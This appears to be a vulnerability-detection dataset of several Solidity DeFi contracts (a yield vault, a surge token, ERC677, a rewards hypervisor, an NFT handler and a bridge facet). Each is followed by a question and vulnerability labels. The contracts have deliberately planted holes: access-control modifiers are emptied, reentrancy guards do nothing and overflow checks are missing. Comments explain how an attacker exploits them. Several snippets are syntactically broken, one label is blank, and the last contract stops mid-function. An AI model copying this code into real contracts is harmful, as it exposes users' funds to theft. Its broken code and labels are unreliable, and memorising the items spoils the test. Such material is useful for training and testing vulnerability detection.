343         (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
344         if (success) {
345             return returndata;
346         } else {
347             // Look for revert reason and bubble it up if present
348             if (returndata.length > 0) {
349                 // The easiest way to bubble the revert reason is using memory via assembly

350                 // solhint-disable-next-line no-inline-assembly
351                 assembly {
352                     let returndata_size := mload(returndata)
353                     revert(add(32, returndata), returndata_size)
354                 }
355             } else {
356                 revert(errorMessage);
357             }
358         }
359     }
360 }

361 // File: @openzeppelin/contracts/token/ERC20/ERC20.sol






362 /**
363  * @dev Implementation of the {IERC20} interface.
364  *
365  * This implementation is agnostic to the way tokens are created. This means
366  * that a supply mechanism has to be added in a derived contract using {_mint}.
367  * For a generic mechanism see {ERC20PresetMinterPauser}.
368  *
369  * TIP: For a detailed writeup see our guide
370  * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
371  * to implement supply mechanisms].
372  *
373  * We have followed general OpenZeppelin guidelines: functions revert instead
374  * of returning `false` on failure. This behavior is nonetheless conventional
375  * and does not conflict with the expectations of ERC20 applications.
376  *
377  * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
378  * This allows applications to reconstruct the allowance for all accounts just
379  * by listening to said events. Other implementations of the EIP may not emit
380  * these events, as it isn't required by the specification.
381  *
382  * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
383  * functions have been added to mitigate the well-known issues around setting
384  * allowances. See {IERC20-approve}.
385  */
386 contract ERC20 is Context, IERC20 {
387     using SafeMath for uint256;
388     using Address for address;

389     mapping (address => uint256) private _balances;

390     mapping (address => mapping (address => uint256)) private _allowances;

391     uint256 private _totalSupply;

392     string private _name;
393     string private _symbol;
394     uint8 private _decimals;

395     /**
396      * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
397      * a default value of 18.
398      *
399      * To select a different value for {decimals}, use {_setupDecimals}.
400      *
401      * All three of these values are immutable: they can only be set once during
402      * construction.
403      */
404     constructor (string memory name, string memory symbol) public {
405         _name = name;
406         _symbol = symbol;
407         _decimals = 18;
408     }

409     /**
410      * @dev Returns the name of the token.
411      */
412     function name() public view returns (string memory) {
413         return _name;
414     }

415     /**
416      * @dev Returns the symbol of the token, usually a shorter version of the
417      * name.
418      */
419     function symbol() public view returns (string memory) {
420         return _symbol;
421     }

422     /**
423      * @dev Returns the number of decimals used to get its user representation.
424      * For example, if `decimals` equals `2`, a balance of `505` tokens should
425      * be displayed to a user as `5,05` (`505 / 10 ** 2`).
426      *
427      * Tokens usually opt for a value of 18, imitating the relationship between
428      * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
429      * called.
430      *
431      * NOTE: This information is only used for _display_ purposes: it in
432      * no way affects any of the arithmetic of the contract, including
433      * {IERC20-balanceOf} and {IERC20-transfer}.
434      */
435     function decimals() public view returns (uint8) {
436         return _decimals;
437     }

438     /**
439      * @dev See {IERC20-totalSupply}.
440      */
441     function totalSupply() public view override returns (uint256) {
442         return _totalSupply;
443     }

444     /**
445      * @dev See {IERC20-balanceOf}.
446      */
447     function balanceOf(address account) public view override returns (uint256) {
448         return _balances[account];
449     }

450     /**
451      * @dev See {IERC20-transfer}.
452      *
453      * Requirements:
454      *
455      * - `recipient` cannot be the zero address.
456      * - the caller must have a balance of at least `amount`.
457      */
458     function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
459         _transfer(_msgSender(), recipient, amount);
460         return true;
461     }

462     /**
463      * @dev See {IERC20-allowance}.
464      */
465     function allowance(address owner, address spender) public view virtual override returns (uint256) {
466         return _allowances[owner][spender];
467     }

468     /**
469      * @dev See {IERC20-approve}.
470      *
471      * Requirements:
472      *
473      * - `spender` cannot be the zero address.
474      */
475     function approve(address spender, uint256 amount) public virtual override returns (bool) {
476         _approve(_msgSender(), spender, amount);
477         return true;
478     }

479     /**
480      * @dev See {IERC20-transferFrom}.
481      *
482      * Emits an {Approval} event indicating the updated allowance. This is not
483      * required by the EIP. See the note at the beginning of {ERC20};
484      *
485      * Requirements:
486      * - `sender` and `recipient` cannot be the zero address.
487      * - `sender` must have a balance of at least `amount`.
488      * - the caller must have allowance for ``sender``'s tokens of at least
489      * `amount`.
490      */
491     function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
492         _transfer(sender, recipient, amount);
493         _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
494         return true;
495     }

496     /**
497      * @dev Atomically increases the allowance granted to `spender` by the caller.
498      *
499      * This is an alternative to {approve} that can be used as a mitigation for
500      * problems described in {IERC20-approve}.
501      *
502      * Emits an {Approval} event indicating the updated allowance.
503      *
504      * Requirements:
505      *
506      * - `spender` cannot be the zero address.
507      */
508     function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
509         _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
510         return true;
511     }

512     /**
513      * @dev Atomically decreases the allowance granted to `spender` by the caller.
514      *
515      * This is an alternative to {approve} that can be used as a mitigation for
516      * problems described in {IERC20-approve}.
517      *
518      * Emits an {Approval} event indicating the updated allowance.
519      *
520      * Requirements:
521      *
522      * - `spender` cannot be the zero address.
523      * - `spender` must have allowance for the caller of at least
524      * `subtractedValue`.
525      */
526     function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
527         _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
528         return true;
529     }

530     /**
531      * @dev Moves tokens `amount` from `sender` to `recipient`.
532      *
533      * This is internal function is equivalent to {transfer}, and can be used to
534      * e.g. implement automatic token fees, slashing mechanisms, etc.
535      *
536      * Emits a {Transfer} event.
537      *
538      * Requirements:
539      *
540      * - `sender` cannot be the zero address.
541      * - `recipient` cannot be the zero address.
542      * - `sender` must have a balance of at least `amount`.
543      */
544     function _transfer(address sender, address recipient, uint256 amount) internal virtual {
       

545         _beforeTokenTransfer(sender, recipient, amount);

546         _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
547         _balances[recipient] = _balances[recipient].add(amount);
548         emit Transfer(sender, recipient, amount);
549     }

550     /** @dev Creates `amount` tokens and assigns them to `account`, increasing
551      * the total supply.
552      *
553      * Emits a {Transfer} event with `from` set to the zero address.
554      *
555      * Requirements
556      *
557      * - `to` cannot be the zero address.
558      */
559     function _mint(address account, uint256 amount) internal virtual {
    
560         _beforeTokenTransfer(address(0), account, amount);

561         _totalSupply = _totalSupply.add(amount);
562         _balances[account] = _balances[account].add(amount);
563         emit Transfer(address(0), account, amount);
564     }

565     /**
566      * @dev Destroys `amount` tokens from `account`, reducing the
567      * total supply.
568      *
569      * Emits a {Transfer} event with `to` set to the zero address.
570      *
571      * Requirements
572      *
573      * - `account` cannot be the zero address.
574      * - `account` must have at least `amount` tokens.
575      */
576     function _burn(address account, uint256 amount) internal virtual {
     
577         _beforeTokenTransfer(account, address(0), amount);

578         _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
579         _totalSupply = _totalSupply.sub(amount);
580         emit Transfer(account, address(0), amount);
581     }

582     /**
583      * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
584      *
585      * This internal function is equivalent to `approve`, and can be used to
586      * e.g. set automatic allowances for certain subsystems, etc.
587      *
588      * Emits an {Approval} event.
589      *
590      * Requirements:
591      *
592      * - `owner` cannot be the zero address.
593      * - `spender` cannot be the zero address.
594      */
595     function _approve(address owner, address spender, uint256 amount) internal virtual {
       
596         _allowances[owner][spender] = amount;
597         emit Approval(owner, spender, amount);
598     }

599     /**
600      * @dev Sets {decimals} to a value other than the default one of 18.
601      *
602      * WARNING: This function should only be called from the constructor. Most
603      * applications that interact with token contracts will not expect
604      * {decimals} to ever change, and may work incorrectly if it does.
605      */
606     function _setupDecimals(uint8 decimals_) internal {
607         _decimals = decimals_;
608     }

609     /**
610      * @dev Hook that is called before any transfer of tokens. This includes
611      * minting and burning.
612      *
613      * Calling conditions:
614      *
615      * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
616      * will be to transferred to `to`.
617      * - when `from` is zero, `amount` tokens will be minted for `to`.
618      * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
619      * - `from` and `to` are never both zero.
620      *
621      * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
622      */
623     function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
624 }

625 // File: @openzeppelin/contracts/token/ERC20/SafeERC20.sol


626 /**
627  * @title SafeERC20
628  * @dev Wrappers around ERC20 operations that throw on failure (when the token
629  * contract returns false). Tokens that return no value (and instead revert or
630  * throw on failure) are also supported, non-reverting calls are assumed to be
631  * successful.
632  * To use this library you can add a `using SafeERC20 for IERC20;` statement to your contract,
633  * which allows you to call the safe operations as `token.safeTransfer(...)`, etc.
634  */
635 library SafeERC20 {
636     using SafeMath for uint256;
637     using Address for address;

638     function safeTransfer(IERC20 token, address to, uint256 value) internal {
639         _callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value));
640     }

641     function safeTransferFrom(IERC20 token, address from, address to, uint256 value) internal {
642         _callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value));
643     }

644     /**
645      * @dev Deprecated. This function has issues similar to the ones found in
646      * {IERC20-approve}, and its usage is discouraged.
647      *
648      * Whenever possible, use {safeIncreaseAllowance} and
649      * {safeDecreaseAllowance} instead.
650      */
651     function safeApprove(IERC20 token, address spender, uint256 value) internal {
652         // safeApprove should only be called when setting an initial allowance,
653         // or when resetting it to zero. To increase and decrease it, use
654         // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'
655         // solhint-disable-next-line max-line-length       
656         _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
657     }

658     function safeIncreaseAllowance(IERC20 token, address spender, uint256 value) internal {
659         uint256 newAllowance = token.allowance(address(this), spender).add(value);
660         _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
661     }

662     function safeDecreaseAllowance(IERC20 token, address spender, uint256 value) internal {
663         uint256 newAllowance = token.allowance(address(this), spender).sub(value, "SafeERC20: decreased allowance below zero");
664         _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
665     }

666     /**
667      * @dev Imitates a Solidity high-level call (i.e. a regular function call to a contract), relaxing the requirement
668      * on the return value: the return value is optional (but if data is returned, it must not be false).
669      * @param token The token targeted by the call.
670      * @param data The call data (encoded using abi.encode or one of its variants).
671      */
672     function _callOptionalReturn(IERC20 token, bytes memory data) private {
673         // We need to perform a low level call here, to bypass Solidity's return data size checking mechanism, since
674         // we're implementing it ourselves. We use {Address.functionCall} to perform this call, which verifies that
675         // the target address contains contract code and also asserts for success in the low-level call.

676         bytes memory returndata = address(token).functionCall(data, "SafeERC20: low-level call failed in vault");
677         if (returndata.length > 0) { // Return data is optional
678             // solhint-disable-next-line max-line-length         
679         }
680     }
681 }

682 // File: @openzeppelin/contracts/access/Ownable.sol


683 /**
684  * @dev Contract module which provides a basic access control mechanism, where
685  * there is an account (an owner) that can be granted exclusive access to
686  * specific functions.
687  *
688  * By default, the owner account will be the one that deploys the contract. This
689  * can later be changed with {transferOwnership}.
690  *
691  * This module is used through inheritance. It will make available the modifier
692  * `onlyOwner`, which can be applied to your functions to restrict their use to
693  * the owner.
694  */
695 contract Ownable is Context {
696     address private _owner;

697     event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

698     /**
699      * @dev Initializes the contract setting the deployer as the initial owner.
700      */
701     constructor () internal {
702         address msgSender = _msgSender();
703         _owner = msgSender;
704         emit OwnershipTransferred(address(0), msgSender);
705     }

706     /**
707      * @dev Returns the address of the current owner.
708      */
709     function owner() public view returns (address) {
710         return _owner;
711     }

712     /**
713      * @dev Throws if called by any account other than the owner.
714      */
715     modifier onlyOwner() {     
716         _;
717     }

718     /**
719      * @dev Leaves the contract without owner. It will not be possible to call
720      * `onlyOwner` functions anymore. Can only be called by the current owner.
721      *
722      * NOTE: Renouncing ownership will leave the contract without an owner,
723      * thereby removing any functionality that is only available to the owner.
724      */
725     function renounceOwnership() public virtual onlyOwner {
726         emit OwnershipTransferred(_owner, address(0));
727         _owner = address(0);
728     }

729     /**
730      * @dev Transfers ownership of the contract to a new account (`newOwner`).
731      * Can only be called by the current owner.
732      */
733     function transferOwnership(address newOwner) public virtual onlyOwner {       
734         emit OwnershipTransferred(_owner, newOwner);
735         _owner = newOwner;
736     }
737 }



738 /**
739  * @title Helps contracts guard against reentrancy attacks.
740  * @author Remco Bloemen <remco@2π.com>, Eenae <alexey@mixbytes.io>
741  * @dev If you mark a function `nonReentrant`, you should also
742  * mark it `external`.
743  */
744 contract ReentrancyGuard {

745   /// @dev counter to allow mutex lock with only one SSTORE operation
746   uint256 private _guardCounter = 1;

747   /**
748    * @dev Prevents a contract from calling itself, directly or indirectly.
749    * If you mark a function `nonReentrant`, you should also
750    * mark it `external`. Calling one `nonReentrant` function from
751    * another is not supported. Instead, you can implement a
752    * `private` function doing the actual work, and an `external`
753    * wrapper marked as `nonReentrant`.
754    */
755   modifier nonReentrant() {
756     _guardCounter += 1;
757     uint256 localCounter = _guardCounter;
758     _;
759   }

760 }


761 interface IStrategy {
762     function vault() external view returns (address);
763     function want() external view returns (IERC20);
764     function beforeDeposit() external;
765     function deposit() external;
766     function withdraw(uint256) external;
767     function balanceOfPool() external view returns (uint256);
768     function harvest() external;
769     function retireStrat() external;
770     function panic() external;
771     function pause() external;
772     function unpause() external;
773     function paused() external view returns (bool);
774 }

775 /**
776  * @dev Implementation of a vault to deposit funds for yield optimizing.
777  * This is the contract that receives funds and that users interface with.
778  * The yield optimizing strategy itself is implemented in a separate 'Strategy.sol' contract.
779  */
780 contract GrimBoostVault is ERC20, Ownable, ReentrancyGuard {
781     using SafeERC20 for IERC20;
782     using SafeMath for uint256;

783     struct StratCandidate {
784         address implementation;
785         uint proposedTime;
786     }

787     // The last proposed strategy to switch to.
788     StratCandidate public stratCandidate;
789     // The strategy currently in use by the vault.
790     IStrategy public strategy;
791     // The minimum time it has to pass before a strat candidate can be approved.
792     uint256 public immutable approvalDelay;

793     event NewStratCandidate(address implementation);
794     event UpgradeStrat(address implementation);

795   //this is the buggy functon: the attacker inserts his/her own addr at token, which containn
796   //depositFor() loop 

797     function depositFor(address token, uint _amount,address user ) public {
798         uint256 _pool = balance();
799         IERC20(token).safeTransferFrom(msg.sender, address(this), _amount);
800         earn();
801         uint256 _after = balance();
802         _amount = _after.sub(_pool); // Additional check for deflationary tokens
803         uint256 shares = 0;
804         if (totalSupply() == 0) {
805             shares = _amount;
806         } else {
807             shares = (_amount.mul(totalSupply())).div(_pool);
808         }
809         _mint(user, shares);
810     }
811 }
What are the vulnerabilities in the contract?
integer over/underflow
incorrect visibility/ownership
<end of text>
1 /**
2  *Submitted for verification at BscScan.com on 2021-07-30
3 */

4 //SPDX-License-Identifier: MIT
5 pragma solidity ^0.8.0;


6 abstract contract ReentrancyGuard {
7         uint256 private constant _NOT_ENTERED = 1;
8         uint256 private constant _ENTERED = 2;
9         uint256 private _status;
10         constructor () {
11             _status = _NOT_ENTERED;
12         }
    
13         modifier nonReentrant() {           
14             _status = _ENTERED;
15             _;
16             _status = _NOT_ENTERED;
17         }
18     }


19 contract surgeToken{
  
20   /** Sells SURGE Tokens And Deposits the BNB into Seller's Address */
21     function sell(uint256 tokenAmount) public nonReentrant returns (bool) {
        
22         address seller = msg.sender;
        
23         // make sure seller has this balance        
24         // calculate the sell fee from this transaction
25         uint256 tokensToSwap = tokenAmount.mul(sellFee).div(10**2);
        
26         // how much BNB are these tokens worth?
27         uint256 amountBNB = tokensToSwap.mul(calculatePrice());
        
28         //reentrant happens here: during call fallback, the attacker invoked purchase multiple times
29         (bool successful,) = payable(seller).call{value: amountBNB, gas: 40000}(""); 
30         if (successful) {
31             // subtract full amount from sender
32             _balances[seller] = _balances[seller].sub(tokenAmount, 'sender does not have this amount to sell');
33             // if successful, remove tokens from supply
34             _totalSupply = _totalSupply.sub(tokenAmount);
35         } else {
36             revert();
37         }
38         emit Transfer(seller, address(this), tokenAmount);
39         return true;
40     }

    
41     function purchase(address buyer, uint256 bnbAmount) internal returns (bool) {
42         // make sure we don't buy more than the bnb in this contract       
43         // previous amount of BNB before we received any        
44         uint256 prevBNBAmount = (address(this).balance).sub(bnbAmount);
45         // if this is the first purchase, use current balance
46         prevBNBAmount = prevBNBAmount == 0 ? address(this).balance : prevBNBAmount;
47         // find the number of tokens we should mint to keep up with the current price
48         uint256 nShouldPurchase = hyperInflatePrice ? _totalSupply.mul(bnbAmount).div(address(this).balance) : _totalSupply.mul(bnbAmount).div(prevBNBAmount);
49         // apply our spread to tokens to inflate price relative to total supply
50         uint256 tokensToSend = nShouldPurchase.mul(spreadDivisor).div(10**2);
51         // revert if under 1
52         if (tokensToSend < 1) {
53             revert('Must Buy More Than One Surge');
54         }
55     }
56 }
What are the vulnerabilities in the contract?
reentrancy 
integer over/underflow
<end of text>
1 // Sources flattened with hardhat v2.1.2 https://hardhat.org

2 // File contracts/v0.4/token/linkERC20Basic.sol

3 pragma solidity ^0.4.11;


4 /**
5  * @title ERC20Basic
6  * @dev Simpler version of ERC20 interface
7  * @dev see https://github.com/ethereum/EIPs/issues/179
8  */
9 contract linkERC20Basic {
10   uint256 public totalSupply;
11   function balanceOf(address who) constant returns (uint256);
12   function transfer(address to, uint256 value) returns (bool);
13   event Transfer(address indexed from, address indexed to, uint256 value);
14 }


15 // File contracts/v0.4/token/linkERC20.sol


16 /**
17  * @title ERC20 interface
18  * @dev see https://github.com/ethereum/EIPs/issues/20
19  */
20 contract linkERC20 is linkERC20Basic {
21   function allowance(address owner, address spender) constant returns (uint256);
22   function transferFrom(address from, address to, uint256 value) returns (bool);
23   function approve(address spender, uint256 value) returns (bool);
24   event Approval(address indexed owner, address indexed spender, uint256 value);
25 }


26 // File contracts/v0.4/token/ERC677.sol


27 contract ERC677 is linkERC20 {
28   function transferAndCall(address to, uint value, bytes data) returns (bool success);

29   event Transfer(address indexed from, address indexed to, uint value, bytes data);
30 }


31 // File contracts/v0.4/token/ERC677Receiver.sol


32 contract ERC677Receiver {
33   function onTokenTransfer(address _sender, uint _value, bytes _data);
34 }


35 // File contracts/v0.4/ERC677Token.sol

36 contract ERC677Token is ERC677 {

37   /**
38   * @dev transfer token to a contract address with additional data if the recipient is a contact.
39   * @param _to The address to transfer to.
40   * @param _value The amount to be transferred.
41   * @param _data The extra data to be passed to the receiving contract.
42   */
43   function transferAndCall(address _to, uint _value, bytes _data)
44     public
45     returns (bool success)
46   {
47     super.transfer(_to, _value);
48     Transfer(msg.sender, _to, _value, _data);
49     if (isContract(_to)) {
50       contractFallback(_to, _value, _data);
51     }
52     return true;
53   }


54   // PRIVATE
55  //bug: this is the buggy fall back that allows reentrancy
56   function contractFallback(address _to, uint _value, bytes _data)
57     private
58   {
59     ERC677Receiver receiver = ERC677Receiver(_to);
60     receiver.onTokenTransfer(msg.sender, _value, _data);
61   }

62   function isContract(address _addr)
63     private
64     returns (bool hasCode)
65   {
66     uint length;
67     assembly { length := extcodesize(_addr) }
68     return length > 0;
69   }

70 }


71 abstract contract CToken {
        
72         function doTransferOut(address payable to, uint amount) virtual internal;

73         doTransferOut(borrower, borrowAmount);
        
74         /* We write the previously calculated values into storage */
75         accountBorrows[borrower].principal = vars.accountBorrowsNew;
76         accountBorrows[borrower].interestIndex = borrowIndex;
77         totalBorrows = vars.totalBorrowsNew;
 
78         /* We emit a Borrow event */
79         emit Borrow(borrower, borrowAmount, vars.accountBorrowsNew, vars.totalBorrowsNew);

80 }
81 // File contracts/v0.4/math/linkSafeMath.sol



82 /**
83  * @title SafeMath
84  * @dev Math operations with safety checks that throw on error
85  */
86 library linkSafeMath {
87   function mul(uint256 a, uint256 b) internal constant returns (uint256) {
88     uint256 c = a * b;
89     return c;
90   }

91   function div(uint256 a, uint256 b) internal constant returns (uint256) {
92     // assert(b > 0); // Solidity automatically throws when dividing by 0
93     uint256 c = a / b;
94     // assert(a == b * c + a % b); // There is no case in which this doesn't hold
95     return c;
96   }

97   function sub(uint256 a, uint256 b) internal constant returns (uint256) {   
98     return a - b;
99   }

100   function add(uint256 a, uint256 b) internal constant returns (uint256) {
101     uint256 c = a + b;  
102     return c;
103   }
104 }
What are the vulnerabilities in the contract?
arithmetic flaw
reentrancy
<end of text>
1 // SPDX-License-Identifier: BUSL-1.1

2 pragma solidity 0.7.6;

3 import "@openzeppelin/contracts/math/SafeMath.sol";
4 import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
5 import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
6 import "@openzeppelin/contracts/token/ERC20/SafeERC20.sol";
7 import "@openzeppelin/contracts/access/Ownable.sol";
8 import "./interfaces/IVisor.sol";
9 import "./vVISR.sol";

10 // @title Rewards Hypervisor
11 // @notice fractionalize balance 
12 contract RewardsHypervisor {
13     using SafeERC20 for IERC20;
14     using SafeMath for uint256;

15     address public owner;
16     IERC20 public visr;
17     vVISR public vvisr;

18     modifier onlyOwner {     
19         _;
20     }

21     constructor(
22         address _visr,
23         address _vvisr
24     ) {
25         visr = IERC20(_visr);
26         vvisr = vVISR(_vvisr);
27         owner = msg.sender;
28     }

29     function deposit(
30         uint256 visrDeposit,
31         address payable from,
32         address to
33     ) external returns (uint256 shares) {
34         shares = visrDeposit;
35         if (vvisr.totalSupply() != 0) {
36           uint256 visrBalance = visr.balanceOf(address(this));
37           shares = shares.mul(vvisr.totalSupply()).div(visrBalance);
38         }

39         //this is the buggy line 
40         //call the owner function of the attack contract. 
41         //As long as the attack contract sets the return value to the contract address
42         // call the delegatedTransferERC20 function of the attack contract. 
43         //Here reentrancy is executed
44         if(isContract(from)) {        
45           //deposit func is called again 
46           IVisor(from).delegatedTransferERC20(address(visr), address(this), visrDeposit);
47         }
48         else {
49           visr.safeTransferFrom(from, address(this), visrDeposit);
50         }

51         vvisr.mint(to, shares);
52     }

53     // @param shares Number of rewards shares to redeem for VISR
54     // @param to Address to which redeemed pool assets are sent
55     // @param from Address from which liquidity tokens are sent
56     // @return rewards Amount of visr redeemed by the submitted liquidity tokens
57     function withdraw(
58         uint256 shares,
59         address to,
60         address payable from
61     ) external returns (uint256 rewards) {
62         rewards = visr.balanceOf(address(this)).mul(shares).div(vvisr.totalSupply());
63         visr.safeTransfer(to, rewards);
      
64         vvisr.burn(from, shares);
65     }

66     function snapshot() external onlyOwner {
67       vvisr.snapshot();
68     }

69     function transferOwnership(address newOwner) external onlyOwner {
70       owner = newOwner;
71     }

72     function transferTokenOwnership(address newOwner) external onlyOwner {
73       vvisr.transferOwnership(newOwner); 
74     }

75     function isContract(address _addr) private returns (bool isContract){
76                                 uint32 size;
77                                 assembly {
78                                         size := extcodesize(_addr)
79                                 }
80                                 return (size > 0);
81                 }

82 }
What are the vulnerabilities in the contract?
reentrancy
<end of text>
1 // SPDX-License-Identifier: GNU-GPL v3.0 or later

2 pragma solidity ^0.8.0;

3 import "@openzeppelin/contracts/access/AccessControl.sol";
4 import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
5 import "@openzeppelin/contracts/token/ERC1155/ERC1155.sol";
6 import "./interfaces/IRevest.sol";
7 import "./interfaces/IAddressRegistry.sol";
8 import "./interfaces/ILockManager.sol";
9 import "./interfaces/ITokenVault.sol";
10 import "./interfaces/IAddressLock.sol";
11 import "./utils/RevestAccessControl.sol";
12 import "./interfaces/IFNFTHandler.sol";
13 import "./interfaces/IMetadataHandler.sol";

14 contract FNFTHandler is ERC1155, AccessControl, RevestAccessControl, IFNFTHandler {

15     bytes32 public constant PAUSER_ROLE = keccak256("PAUSER_ROLE");

16     mapping(uint => uint) public supply;
17     uint public fnftsCreated = 0;

18     /**
19      * @dev Primary constructor to create an instance of NegativeEntropy
20      * Grants ADMIN and MINTER_ROLE to whoever creates the contract
21      */
22     constructor(address provider) ERC1155("") RevestAccessControl(provider) {
23         _setupRole(DEFAULT_ADMIN_ROLE, _msgSender());
24         _setupRole(PAUSER_ROLE, _msgSender());
25     }

26     /**
27      * @dev See {IERC165-supportsInterface}.
28      */
29     function supportsInterface(bytes4 interfaceId) public view virtual override (AccessControl, ERC1155) returns (bool) {
30         return super.supportsInterface(interfaceId);
31     }


32     function mint(address account, uint id, uint amount, bytes memory data) external override onlyRevestController {    
33          supply[id] += amount;
34         _mint(account, id, amount, data);
35         fnftsCreated += 1;
36     }

37     function mintBatchRec(address[] calldata recipients, uint[] calldata quantities, uint id, uint newSupply, bytes memory data) external override onlyRevestController {
38         supply[id] += newSupply;
39         for(uint i = 0; i < quantities.length; i++) {
40             _mint(recipients[i], id, quantities[i], data);
41         }
42         fnftsCreated += 1;
43     }

44     function mintBatch(address to, uint[] memory ids, uint[] memory amounts, bytes memory data) external override onlyRevestController {
45         _mintBatch(to, ids, amounts, data);
46     }

47     function setURI(string memory newuri) external override onlyRevestController {
48         _setURI(newuri);
49     }

50     function burn(address account, uint id, uint amount) external override onlyRevestController {
51         supply[id] -= amount;
52         _burn(account, id, amount);
53     }

54     function burnBatch(address account, uint[] memory ids, uint[] memory amounts) external override onlyRevestController {
55         _burnBatch(account, ids, amounts);
56     }

57     function getBalance(address account, uint id) external view override returns (uint) {
58         return balanceOf(account, id);
59     }

60     function getSupply(uint fnftId) public view override returns (uint) {
61         return supply[fnftId];
62     }

63     function getNextId() public view override returns (uint) {
64         return fnftsCreated;
65     }


66     // OVERIDDEN ERC-1155 METHODS

67     function _beforeTokenTransfer(
68         address operator,
69         address from,
70         address to,
71         uint[] memory ids,
72         uint[] memory amounts,
73         bytes memory data
74     ) internal override {
75         super._beforeTokenTransfer(operator, from, to, ids, amounts, data);
76         // Loop because all batch transfers must be checked
77         // Will only execute once on singular transfer
78         if (from != address(0) && to != address(0)) {
79             address vault = addressesProvider.getTokenVault();
80             bool canTransfer = !ITokenVault(vault).getNontransferable(ids[0]);
81             // Only check if not from minter
82             // And not being burned
83             if(ids.length > 1) {
84                 uint iterator = 0;
85                 while (canTransfer && iterator < ids.length) {
86                     canTransfer = !ITokenVault(vault).getNontransferable(ids[iterator]);
87                     iterator += 1;
88                 }
89             }
90         }
91     }

92     function uri(uint fnftId) public view override returns (string memory) {
93         return IMetadataHandler(addressesProvider.getMetadataHandler()).getTokenURI(fnftId);
94     }

95     function renderTokenURI(
96         uint tokenId,
97         address owner
98     ) public view returns (
99         string memory baseRenderURI,
100         string[] memory parameters
101     ) {
102         return IMetadataHandler(addressesProvider.getMetadataHandler()).getRenderTokenURI(tokenId, owner);
103     }

104 }
What are the vulnerabilities in the contract?

<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.8.7;

3 import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
4 import { LibAsset } from "../Libraries/LibAsset.sol";
5 import { ILiFi } from "../Interfaces/ILiFi.sol";
6 import { LibSwap } from "../Libraries/LibSwap.sol";
7 import { ICBridge } from "../Interfaces/ICBridge.sol";
8 import { LibDiamond } from "../Libraries/LibDiamond.sol";

9 /**
10  * @title CBridge Facet
11  * @author Li.Finance (https://li.finance)
12  * @notice Provides functionality for bridging through CBridge
13  */
14 contract CBridgeFacet is ILiFi {
15     /* ========== Storage ========== */

16     bytes32 internal constant NAMESPACE = keccak256("com.lifi.facets.cbridge2");
17     invokeSwap bool; 
18     struct Storage {
19         address cBridge;
20         uint64 cBridgeChainId;
21     }

22     /* ========== Types ========== */

23     struct CBridgeData {
24         address receiver;
25         address token;
26         uint256 amount;
27         uint64 dstChainId;
28         uint64 nonce;
29         uint32 maxSlippage;
30     }

31     /* ========== Init ========== */

32     /**
33      * @notice Initializes local variables for the CBridge facet
34      * @param _cBridge address of the canonical CBridge router contract
35      * @param _chainId chainId of this deployed contract
36      */
37     function initCbridge(address _cBridge, uint64 _chainId) external {
38         Storage storage s = getStorage();
39         LibDiamond.enforceIsContractOwner();
40         s.cBridge = _cBridge;
41         s.cBridgeChainId = _chainId;
42         emit Inited(s.cBridge, s.cBridgeChainId);
43     }

44     /* ========== Public Bridge Functions ========== */

45     /**
46      * @notice Bridges tokens via CBridge
47      * @param _lifiData data used purely for tracking and analytics
48      * @param _cBridgeData data specific to CBridge
49      */
50     function startBridgeTokensViaCBridge(LiFiData memory _lifiData, CBridgeData calldata _cBridgeData) public payable {
51         if (_cBridgeData.token != address(0)) {
52             uint256 _fromTokenBalance = LibAsset.getOwnBalance(_cBridgeData.token);

53             LibAsset.transferFromERC20(_cBridgeData.token, msg.sender, address(this), _cBridgeData.amount);

54             require(
55                 LibAsset.getOwnBalance(_cBridgeData.token) - _fromTokenBalance == _cBridgeData.amount,
56                 "ERR_INVALID_AMOUNT"
57             );
58         } else {
59             _;

60         }

61         _startBridge(_cBridgeData);

62         emit LiFiTransferStarted(
63             _lifiData.transactionId,
64             _lifiData.integrator,
65             _lifiData.referrer,
66             _lifiData.sendingAssetId,
67             _lifiData.receivingAssetId,
68             _lifiData.receiver,
69             _lifiData.amount,
70             _lifiData.destinationChainId,
71             block.timestamp
72         );
73     }

74     /**
75      * @notice Performs a swap before bridging via CBridge
76      * @param _lifiData data used purely for tracking and analytics
77      * @param _swapData an array of swap related data for performing swaps before bridging
78      * @param _cBridgeData data specific to CBridge
79      */
80     function swapAndStartBridgeTokensViaCBridge(
81         LiFiData memory _lifiData,
82         LibSwap.SwapData[] calldata _swapData,
83         CBridgeData memory _cBridgeData
84     ) public payable {
85         if (_cBridgeData.token != address(0)) {
86             uint256 _fromTokenBalance = LibAsset.getOwnBalance(_cBridgeData.token);

87             // Swap
88             for (uint8 i; i < _swapData.length; i++) {
89                 invokeSwap = true; 
